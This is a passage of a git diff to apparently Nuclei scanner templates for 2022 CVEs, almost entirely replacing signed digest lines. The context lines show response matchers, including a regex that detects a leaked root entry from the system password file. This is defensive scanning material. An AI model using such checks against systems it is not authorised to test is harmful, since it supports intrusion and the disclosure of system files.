4a0a00473045022100f0f18eda158c5fe7f0c8f8d7e80395bbe52d7bb9fcb75f542a040c53ce757735022054c276ee41a741ecd9a6f40d4d8d52581836eeb81214b9110ca47b6c6149a0be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index d295726da5..2b2b7709de 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a0bf6688a368fac230bd01722ccc5ff4a0094c997d4bc9e929424d1b2811d3d6022100dbac1fd1415a66ee1b95e9b5ae6303e3cb1fed954b0b80af47c8665c3c6db65a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbc7a4be2db79fa23a7322882eaee4e6265c68ed63a1f362330c9cdfc9cc6e080221008b8fe074d0e0ed77669e14a6d9485d5308a3f1daadeb7f96c155aab4c2dc56d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml index cdb0f5b452..816d2ce143 100644 --- a/http/cves/2022/CVE-2022-4059.yaml +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -48,4 +48,4 @@ http: - 'status_code_1 == 302' - 'contains(body_2, "Cryptocurrency Widgets Pack")' condition: and -# digest: 4a0a00473045022100ec787a041969c87a9d0dfe9246ba9dbae1cdddae1fab53af91e2d39f501e35f1022005e07d6858416eed4f65ee7c5b6d8edf6a2538f6550466bd97a1ed559d5fad70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aa848372256d7eabf159884aa037d2138e09d0c0e9364174fb773e7750150b5b02205114c8a8a2cefe0b44d0a1bf4545e9497db91863201b990cb9b3d8ab8e430547:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 8164ade2d3..f96d35b8d2 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022001c30dda208f23934117d6648b68a7cbc6063bd9487648f9d3cb3f954c8fb469022100eb1c85cee64fa01d404510e98f5b9c0975e3511b85a8e515435a7dce0084aef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022003b909b45dd43d102d789aceac9e83ac9b866ba5947d32ad06b7274a7bc8cb450220620859cb067102ad07e87d6df0236938224fa2233e831bd2a3ea100413a99c8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index 7f438f0a4f..304af08190 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -44,4 +44,4 @@ http: - type: regex regex: - "root:[x*]:0:0" -# digest: 4a0a00473045022100e98a87c4d16d7f1e1f4e3bd878e6b85448431976ad3ab893d2ce311bfbe051b002203da7fdd5c7a3b5bb0627aa18f2b5a7366a66ad2b2de1a34d774c059b20bd28d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e14c07ad587a3f6127ab6597730c3e3f61032076278d8cb85f9716bc1772e248022100824d3485478fe6a408364349dce3a19485ba0d97cc0000fed941aefb72e9bef5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index da58a2fe39..cb1db7ffda 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d2aad06ddab3ccd6e666e1cc53a8974249101d2a25b364fb4b96543189e71c450220673c9fddd115564cbbe4faa07d9de703be2cd6af8eede2a57e4408e9ba10d5af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207422cca17346734af8803e05435d968ee607fb4d1020131202813e2275ce90fd022100d04e21dd1aeed78f39fe54ffd517fc0697342080ce5c9031dc72b12c2278db35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index 432e1b7944..d9cb8ada39 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022002d0aafae336d011a0a74b01352143f57a21e65003ac86e0ea9563934522d3c80220494bc3ac1854a6da8d5cc61b7c8b2b0158429cb26e83ab3f628b90e2dfb751a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220486e0cb03c2e34247dedc7a42f63cb1ed28d217628d3928db994c42f82eb87fc02203f6caf27418908145e8df9ef5e14d21bcec4f05d876ffaeb892707180ae6ad09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index db182f973a..38c81c3963 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cf7cdba34d65b8edb10f08b9b4c8fe7f62ad2f48374d0ebc15d7f2bfbda8b361022100db8d88fc5035579a5be45602c1ebb9ac2daf06fa12f71eea28888fc63f5242b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220364ed7094ab718d0431d62a890a3195e8a44e770c3f86399f40e0ef3bf82e2e002210086e72e146fd8e3f380f84e27adf02191f4bd968348207d06486ee47d6f1e7f1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index 47e9ed5811..6396ed4103 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -49,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "\"status\":200") && contains(body, "{\"html\":")' condition: and -# digest: 490a004630440220527f8e6fc57bb3c042da2a2145f63f88cab3db7eeb282091c66cf526cd9b36e30220586c5e71de7bd30a22f81171809aba45884a19aea6b85a63181ef2de54f14d63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202704d1c9461ae76669983a31346667ea111b788f256f839824cbf7cf4827f63c0221008e40f7f3f0e50e9046c12b23cd755969d0e2634902e73a21392d7655069691fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41412.yaml b/http/cves/2022/CVE-2022-41412.yaml index 4c5cf2039d..09867aabce 100644 --- a/http/cves/2022/CVE-2022-41412.yaml +++ b/http/cves/2022/CVE-2022-41412.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e598e38759b6d2c7b34ecb326730371101115feee22f2e9a4e8ecf3fdb09f45902204532d257a96dbe274009bfc99b23ace1c08d5824445578aed77faf1654dc813e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e289bfe0e9e294db8ec0302ed57729f551317c0e023ead21655a3094f8f53af7022100d799e09b724832d7efbc4cf2e89d16d68785ef1a9ee0af3b5fd3806d750bb936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index 55a5b61b57..ecbc89d286 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -48,4 +48,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body_2, "") && contains(body_2, "POProcessTimeout")' condition: and -# digest: 4b0a004830460221009639948683a1cbabebf7e7ebb27e2e1f72a571fd097c09de93b67ea65d95f021022100f0953cb6c21404e57e03e89f6d3b1956c83911cb12cad4bef5b21c86d957ece6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201c7ef3b8c12ab51dc33ff38f8ed0b048b9ca192ded1f57a3c2c8b201196cc3e4022069beb886ff9cc76db0c72220d36592f48578c9909c820680621dcc6f556abb2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index b71b44fa26..d3fd5a34f8 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f8b489e0526233fadc0b71daa6165ce5043a99bcc11cfb0efec40a01d0adb68e022100c10051f21c0b7d95b703834dd555ff205cff4cd72e743f60787f628f9800bb44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205dbe51398af59064054a0f4a137661c719a7bbdfb4fba9a4416a0c8e329177ae02203007e3f7e09d32b655a478a58c1034a26954e59325f5d4946da39ce865b77473:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 5db21049c2..14ab26f454 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -170,4 +170,4 @@ http: regex: - name="form_token" value="(.*)" internal: true -# digest: 4a0a00473045022100833759ad52afd13abc5b49fcd770918213699021dbc4ed1ad7e66372e0f0548302201073403909a88ddab9ad7c88c79479b903f7d8b8dced717e7d8d0e89a6f05b3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009254c581a66525d51374780544548b0fe6f6ae80401be65bd189894a7f566980022047ad24d5ffa12be36ccdc28b16554bebad6f96e3a4e0ef86623ac93beedba22e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml index 9f6cb66404..1d99c2f0ee 100644 --- a/http/cves/2022/CVE-2022-42096.yaml +++ b/http/cves/2022/CVE-2022-42096.yaml @@ -188,4 +188,4 @@ http: regex: - name="form_token" value="(.*)" internal: true -# digest: 4a0a00473045022100d511f8ca03bfd62c3ce9d4eb61ca34977675265bb516ecfc806a64e8785b81d6022041909cc1f36dc06c223ccc56a5e642045be29cfddd45f69658f28149169cf16e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c7cd418af97444eb54e6d2a1d5baa6163d10a42822a43a16dd45a3c3128484e9022100d9ff9dbf306d6c38bf75de7c7aa3bb289d403b5506c3617d761d657a7289651d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml index b04ac726d0..70d7002717 100644 --- a/http/cves/2022/CVE-2022-42233.yaml +++ b/http/cves/2022/CVE-2022-42233.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b86e4c63dbaa65f20b84e2935e6d84f986fd943c6f626ad3a2d1b00526ea1d4c022071e2e1880c20e23bb3959dfd91cb4b52727a1129c9cc198ff74b8e5674d0c96a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210097665e0767c934a666cf05e3627f2b6d8dd5884c8d1357133b6c1a3af43b2d7a022100cc472353a177d1e473f1016d6ec099a23dff7144e78b65aba6b2013f40bdc009:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index 58952063d7..c5e80e79f7 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100e05a50a6e132bac1f32ae519749f19608d564459b4cf2f5bc78878bc392979d802205e3df75d54d4f3d858178677f1d15edc59f2dcba8a7121a985e690d1131a06b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022039fe11caf5250995e163d4a766f610d944380417a5b15906a9ef6a50792288bc02210093ff5a9b48efb195c8f6dfbc8f5cd26393edf6f89159808dce94156e8fe2c052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index 9a9c3581ae..d6d35eb203 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 404 -# digest: 4a0a004730450220674c64cb82f47fccf84aa02992e2383beb4ef86186c3540610bd5302bbaeb13e0221008dd0a1ac41467e3520b176248f8c8292dfdabd050f6915f34a0a248f760782b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d31eac3d15d81134911f90f3c97df9b33a3f368a6e719f11104eb87b6b014a64022100b087422d6f0c4d4b4ac90c6da503f8cde1a878308d465636399a9a8770b32912:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index b6b020f53c..d3e44e6d09 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100bb5ffd4b21e445cf4234b76fc85113266a75cdbb2da6bb13444795dc3af242f1022022a7de122c708996659ebc47a7766409e68978393245344a63e8f68221e40060:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002211a03096dd54eb8c3d75c4c6b2ec6e688174a032a7e6c2aa6abf607de4458022100cb1bece977e680447b79ab7a7829bea6009908a87348e63ddeba2341904d33fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index 757812e06d..674ba7414d 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 404 -# digest: 4a0a0047304502210089fe04a15e4eed93eec92622f8f739ff1ae8fbf29d5bbed7f4d299bb7ea9e38a0220668d4c0c8de7a37e6d9c004beb28ba0b5f40262c4252936318e4798275678c65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220010262b4de9c6ff3122acc32c8ece3f4732b2d28ed1e6d3048a1524b26505297022100f98b46a4ccfddc90026ae807b177eece99376bfde1ec4ef6b03c52ec88157a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index 2928cc45f8..d6ad8ae12e 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -46,4 +46,4 @@ http: - 'contains(body, "")' - 'contains(body, "Select ")' condition: and -# digest: 4a0a0047304502203dbda7150adc50b6dfb1c523f72b257beda768f3910e46959f2b0ab81f805ae8022100becbd420e250bfaf91f33df4b6663c17f4a2fe2f82e4c1790a3b7f0f2476e7a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022063e17e9119db0e711c2185a23a857e3c34a07b1c70353f799246c634d4e373b502210098e4d61d55e9bf0a4baa6ef83c2d08c7c8e434dbcbfbd7a125170ccb3658d056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 85067c7dfd..597ad2ddb7 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c667dbcf839a9b9666df759b351aa9863dd80927da1c754456cb38c9f1d2c74f022100b3f9f463cf96b3f9aca85d17122255bfe96dda694721022db00ae6e73b6701b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8d42704600cbd3b6ff54126c94d34ed31967c6de8e2a12c926fbb45a236956902205488ccf7f3b181305fec30b4573024752ec9767624d685bc0b5391b87453f1ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index a7e4f8bb52..9775a520b9 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207e5d9a4f267de600ae65549cbff97de0d51d050c89c4fef7fc2310d605343dfb02203c9e7bc08b6191c455ed70968efc3fb33378ad50795931fe96f85b24732fc83b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e4ae4211819c3a0102f74e2f01245fa1f03ed7819b74592072bfe869bddf2853022100bd69a98016f2f0a1f19b4db4f757a6dd1986e530b5b323f0450d9bbc9f9528c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index 92b353c8fa..a1092ce628 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ba6921db05acebd0c6310fe279d69a0241eea61a56fe98076c3acbbbde12bd302206466948902e44608beedb1c1ae6d7c10f935634a10fc2a843fc9362270070d4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022056ef355da515fd5fec4be2362351876869abc614ca07d9fce9a039bee8eccc02022100e3e2aa9accb169e9c661823b305d23dd0d1556dbfadb8071fecce855502ee56b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index b54cfe9af1..792970c05a 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dd87ebfe6d6cf8f91e1b8675a0783c24940fcd4f08ce35c16db45abbe6e0113b022015d1ef8dd35c27d9ae583a14fe81180a74d4d6b16e278c22df6dcc6eaf331d12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a93db41929ce060ff64fee5328f57e9aab33ae2d90304cfd9045ff515b71bd1c022060dcf99e3c0172ccfcd1f7d068dfe41d2b7eb794183cacb03efab0efefc6f339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index a17b4eb1c0..d1a00915ab 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022037f2672c9d3f40fe1c475aba72b2b7a715a05dcaf7c74852c8259fb3d9b56ef7022049e93237d4d7b9f02e2381b97d9251f3f7ff608f1214edb5e5a4926275f7d60f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008ab01aaa506a6ebbad0beb8069bc5370186ee053320cfa747184e193f37d774a022100b0046b6845259abb54266ef0299e04aaf6dc2cdff6f3d9c86c29cd20b534bc53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4305.yaml b/http/cves/2022/CVE-2022-4305.yaml index 7a380b5adf..54123c2046 100644 --- a/http/cves/2022/CVE-2022-4305.yaml +++ b/http/cves/2022/CVE-2022-4305.yaml @@ -47,4 +47,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts') condition: and -# digest: 4a0a00473045022100f40d1c4af7efd3f85e0f706dd731556e8b8c115e956fbb33fde0a16ebaa3183002200422ebf2a940f67382378fbf9b001f144f552465c6679e84b40560db876877cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204036ea21962a8358bf28cfe4e30afd87bee2fbd81960480db8568c56da29777902207c2d8fa3bae877879ef164102d75f536f8c843c4e1d443c9bc9c73c33417d370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index cd761c6f9f..0d0ddd2969 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -66,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a004730450220374b4e737a4fea8aa81413415c068ca4f57e725140e681a365c5fbfb01e99a5e02210083a924bcf9686759e21f03d28055d3ee09a2927940b21ea9c304314f32ab045e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f5d1ea712656f85c01c259e31b70596810c89dcc922913583b8eaac709a470002205131821d069a47e71f515eb822596009a6662151409dfe920616f1c833a70efc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index 00c47dfce3..e02cf51aae 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -67,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100a958b45d49983e3429a0ec6f07591152011ae00c2d6650b2ba2d7cf45ee7cc59022100e8ddb96382cc892ab1f074d69a55545f04831c4f6646fa78ec57870208a9db0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e808a43a439e765a63d1b5cad4a5beeaa462bb15bcd0d6b064822dd624152fad022032ef9ca1827b9acfd5826cef54120a9a5117625af4e9f1378a351b26444de0f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index c80e682bb4..0260380daf 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -67,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a00463044022073ffd18a48fa52cec919649b657d84376a793ad133c7b39d97b8d185b58a3d0c022078b83eb05ade26cc3df8dd6618ade63db583eea4d1911033468084f1cb2bf959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022040585671c609fe334367822249136fb6366ff15bb77949df51bd3507925f2761022100b01f4c652002b57730f4b33c3d84cb008efda5f95ba10bcb36d58277216be1c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index 1298ccca67..d2b145f378 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -66,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100ca9e12798bdb85ab1b55ededba807df802f821b90f81117202c99e86869a86a0022100e8b453b46860085a0f2cbe7d66113b72e4e39f539ff8c745b3f9db7ce1d3c2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fd6591bc51f266f675743710abbcf5977d606dfff7c166754ce2e90e33d44312022019bc20df736191c6fd9db84bd4090aa89c6b46edc6b63f51d171eebfa307b3f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index 6380bf2f13..ef33f372c0 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -67,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a00483046022100ceebff44463a50c3f8cdfd03eb5a3449476a6d347a5014da85b0dc03d249e1dc02210089091f4d3daefd628b027f9ba865a756c4f31281aec45252b014c6653e2ebb28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008fbf5c0f8673a21f5b852a6d4ad1a70d44c24f166a11c1d30c7e5f19d78933d3022100d8a0f653d81329054a3902f01425e0b86f10f76908ad1127b2b4054db7de4c22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index e6e9cba7f6..13c47d1c7f 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -67,4 +67,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a00463044022050159dcb3305abbac67f828aa26ed8c27682f0fab2c0ebe28a29cbbaf8adb450022065e31b15fafe74e1177ad1e2787cf1d8483181eae49e031828eb791e6640e622:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a9f70675d0f9bbc565259bec1b966bb4bc99bc470cf99302ee287e5dc66c76102201dc4505f6d046ffad4cac841b64bb7ca57c420eab6045422bb18804578d1219a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index c9fc1fb9ef..10dee154bf 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -65,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a00473045022100bc300fd32b6adf7bc6aac4589f0eb432976dd5e3e894c339bb71185d1b37c6da022043adf86185cdd562f52a3f7407dbe76cf38ac54c42fb933cbf55a15ed9a3b952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220777f68c6c7edb9b9127312f9deb85b16ffe7931cf295fdf733b9f29112feceac022100f56c9fd54f660add620c43e5191517c6736e3f2190778df91cfd8576b8e43b3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index 076660f1da..00849a488f 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210083c8c3f4e22e416c26bdc706267a29aa4b94d13ca7d660eb68252ea62f0060fa022042f44c28eaba59c10e9718743b4c4f9826d6aa75302d56062cefbb4a345e98fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d1d3e1624f6b7d4937d108b86ac91b2bc80ae4e861df56df8d26c87a1985d5e022100e1aae9b6ef9306b43a16bf1defea1dffeda0cfcb6d286fb4a91eb74db4f94022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index 359b193a5a..d44d8a29fa 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -51,4 +51,4 @@ http: part: header words: - "application/json" -# digest: 4a0a00473045022100b6741a571d75e359c60ca79e0081337777b9697c68b0739b50509dc80d199bb3022051e8b48b4f9a5f97c6c7c753a04b14967c4a085998f070e01e462a0e8e0a6561:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9d63bc45aaf82137f887487f967ad8d4a41d3f913dfc5b4d4d7d4c5587ca0c2022100f949ff4cefbc5e5c63a8c50244c0e269764063a363693d776245a8dc60f86bf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44290.yaml b/http/cves/2022/CVE-2022-44290.yaml index 4f0e01014a..9900d63e5b 100644 --- a/http/cves/2022/CVE-2022-44290.yaml +++ b/http/cves/2022/CVE-2022-44290.yaml @@ -63,4 +63,4 @@ http: - contains(header, "text/html") - contains(body, 'Delete the following?') condition: and -# digest: 4a0a00473045022100ec9c9149107256ee388b4fad74e2dd7cb17cd09813c8e78bfee6e1f3fa76f85402206e12fab64eaca7a7280bd62ee2af0e78d716ae1ae94ef685835435bf889b63b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085b42f8dbd813c96278a0624ae4a965cdc783df9e3aa63049b454bd2ae602013022029dbcaa2e3817680a0953759908166cd302d0bd893beb86fc9f17de74ff7b75f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index 765fc77d75..00b709a0ca 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "{{md5(num)}}")' condition: and -# digest: 